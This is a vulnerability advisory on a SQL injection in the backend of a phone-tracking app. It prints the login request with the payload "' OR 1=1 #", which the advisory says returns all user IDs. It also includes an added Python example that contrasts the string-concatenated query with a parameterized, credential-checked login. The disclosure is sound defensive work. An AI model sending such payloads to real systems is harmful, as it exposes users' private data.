SIK-2017-047
Title:
Complete Access to all User IDs in GirlFriend Cell Tracker App
Report ID:
SIK-2017-047
Summary:
- Vendor: SoftSquare InfoSoft
- Product: GirlFriend Cell Tracker App (Package-Name: com.omrup.cell.tracker)
- Affected Version: 1.20
- Severity: High
- Short summary: Nearly all endpoints yield a classic SQL injection; supplying simple SQL syntax as a parameter in the HTTP request is enough.
Details:
The backend is self-implemented and is accessible without any reasonable access control. In particular, the login endpoint can be addressed by a POST request as follows:
POST http://****/****/api/login
{
"user_email": "{the user email}"
}
When the user email is replaced with a SQL injection payload, the response yields all user IDs:
POST http://****/****/api/login
{
"user_email": "' OR 1=1 #"
}
Workaround:
–
Suggested Mitigation:
The backend is broken on a conceptual level. Please implement a proper access control mechanism; the OWASP Access Control Cheat Sheet may help. Independently of that, every database query that takes request data must be parameterized rather than assembled from the raw parameter.
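The following is an added example, not the vendor's code and not taken from this report: it contrasts the query shape the login endpoint evidently uses (request value spliced into SQL text) with a parameterized lookup that also applies the access control the mitigation asks for. The schema, the user records, the secret-based check and the use of SQLite are all assumptions made for the example; the vulnerable query string is only built, never executed.

```python
"""Hardened login lookup for the advisory's /api/login endpoint (added example).

Assumptions: a `users` table with id/email/salt/pw_hash columns, an in-memory
SQLite database, and constructed sample users. The real backend's schema,
database engine and credential scheme are not known from the report.
"""
import hashlib
import hmac
import os
import sqlite3
from typing import Optional


def _hash(secret: str, salt: bytes) -> bytes:
    # Slow, salted hash so a leaked table does not directly expose secrets.
    return hashlib.pbkdf2_hmac("sha256", secret.encode(), salt, 50_000)


def setup_db() -> sqlite3.Connection:
    # Constructed sample data for the example; not the vendor's data.
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT UNIQUE, "
        "salt BLOB, pw_hash BLOB)"
    )
    for uid, email, secret in [
        (1, "alice@example.com", "alice-secret"),
        (2, "bob@example.com", "bob-secret"),
    ]:
        salt = os.urandom(16)
        conn.execute(
            "INSERT INTO users VALUES (?, ?, ?, ?)", (uid, email, salt, _hash(secret, salt))
        )
    conn.commit()
    return conn


def vulnerable_query(user_email: str) -> str:
    # The pattern the advisory describes: the request value becomes part of the
    # SQL text, so a quote in the input changes the query's structure. Returned
    # as a string for inspection only; it is deliberately not executed here.
    return "SELECT id FROM users WHERE email = '" + user_email + "'"


def login(conn: sqlite3.Connection, user_email: str, secret: str) -> Optional[int]:
    # Parameterized lookup: the driver passes the value separately from the SQL
    # text, so the advisory's payload is compared as a literal email and matches
    # no row instead of collapsing the WHERE clause.
    row = conn.execute(
        "SELECT id, salt, pw_hash FROM users WHERE email = ?", (user_email,)
    ).fetchone()
    if row is None:
        return None
    uid, salt, pw_hash = row
    # Access control: the caller must prove possession of the account secret,
    # and on success receives only their own id, never the whole table.
    if not hmac.compare_digest(pw_hash, _hash(secret, salt)):
        return None
    return uid


if __name__ == "__main__":
    db = setup_db()
    print("unsafe query text:", vulnerable_query("' OR 1=1 #"))
    print("payload via parameterized login:", login(db, "' OR 1=1 #", ""))
    print("valid credentials:", login(db, "alice@example.com", "alice-secret"))
```

The point of the contrast is in `vulnerable_query`: the moment request data is concatenated into the statement, the database cannot tell data from code, and no amount of access control elsewhere recovers that. `login` shows the two fixes the advisory's mitigation implies together: a placeholder (`?`) for every request-derived value, and a credential check before any record is returned.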
Timeline:
- 2017-08-09: Vulnerability Discovered
- 2017-08-29: First Email sent to developer
- 2018-08-11: Published